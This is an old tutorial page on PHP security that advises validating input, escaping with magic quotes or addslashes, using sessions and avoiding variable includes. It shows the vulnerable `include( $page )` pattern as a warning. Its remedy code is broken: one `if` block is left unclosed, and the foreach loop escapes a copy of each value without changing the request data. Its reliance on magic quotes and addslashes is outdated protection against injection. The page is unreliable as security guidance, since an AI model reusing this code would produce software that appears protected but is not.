home about us contact us

free scripts advanced scripts online tools great books web related tutorials contributed tutorials news archive geek toys!

help forum live chat help

PHP: Security in the use of the language

Note: this page may display oddly because of the use of the "pre" tag. If that occurs, try setting your display for a smaller font.

PHP is a great language. It is ready made to interact with mySql and other similiar databases. However, because of it's ease of use, it can provide security breaks for both new and experience programmers.

Always Validate User Input!

All sorts of havoc are possible if a user passes unexpected content to a PHP script. To avoid that possibility, you must validate user input. This is perhaps the number one rule of any server side programmer.

Validate Client Side:
You can/should validate with javascript in any form which seeks user input. The advantage of javascript validation is that it will reject improper content without touching your server. However it provides no protection against intentional misuse.

Validate Server Side:
Even if you have strong client side validation, you must also validate on the server before performing any action with user provided input. If you have read any of the HTMLfixIT perl tutorials, you know how strongly we feel about using taints mode for this very reason. If you ask for one type of information, but receive another, a malicious user could hack your database, or gain access to critical system files.

Use Magic Quotes?

Magic Quotes, a somewhat unique feature of PHP is automatically on in most configurations. You can find out if it is on in your server's PHP installation very simply (along with a whole lot of other helful information) by running phpinfo. If you need a copy of that script, you can get it here. Look for the line: '--enable-magic-quotes' under the Configure Command section. If you are only going to run scripts on your own server and you are sure that it is on, then you have one big hurdle taken care of. However, if you may run the script elsewhere, or someone else runs your server configuration, you may want to add language to escape any special characters passed to you by a user. There is a very helpful article here which explains the problem, but stops short of offering the solution. We suggest the following code as the solution:

//seek to avoid non-magic_quotes risk
if (!ini_get('magic_quotes_gpc')) {
$variable = addslashes ($variable);

Obviously, each variable would be inserted where the word variable is in the example. If you used a large number of variables, then you would want to consider a function to repeat the task with passed variables that might looking something like this:

/* works in PHP 4.1.0 and up as $_REQUEST is an
associative array consisting of the contents of
$_GET, $_POST, and $_COOKIE */
foreach ($_REQUEST as $key=>$value)
    if (get_magic_quotes_gpc()==0)
       $value = addslashes($value);

Bake Without Cookies!

Cookies are sometimes used to pass important information, usernames, passwords, and login status. Much better that you learn about sessions. Sessions store the information server side and are much more difficult to hack, spoof or crack.

Avoid the Use of Variables in Includes and File Calls!

Some coders feel they are writing good open ended modular scripts when they say something like:

<?php include( $page ); ?>

But consider the effect if someone passed this variable to the script:

It would load the remote server's page, because PHP isn't particular about what comes into it. So avoid using variables to include or require other pages.

Global Variables - and on-again, off-again proposition:

Global variables were thought to be a great feature of PHP. Imagine the effort that can be saved by simply creating variables automatically from post and get. Unfortunately if carelessly used, they can cause problems. It is usually best to turn them off unless you know exactly what you are doing.
If you do feel the need to leave them on, its a good idea to pre-declair variables with fixed values prior to using them.
  $somevar= 1; # this variable can now be safely used as you have removed
# the chance of it retaining a value because a ?somevar=some_nasty_value
# string was added to the script address.

so that if a somevar param is passed to the script, it will be overwritten by the value you have specified manually, thereby making safe what could otherwise be a risky bit of code.

Be Careful Out There ...

If any of you remember the TV series, Hill Street Blues, the Captian always released his police officers with the phrase, "be careful out there," because the world can be a dangerous place. However, just because it can be less than perfect, don't be afraid to venture forth, just spend a few minutes being sure your code is as tight as it can be from a security perspective. You can always do more, but be sure to at least cover the basics, to avoid difficulties down the road.

Lots More Help Out there:

PHP Security and Efficiency
Portable PHP Code (

So if you are ready to learn more ...
Back to the Tutorial Index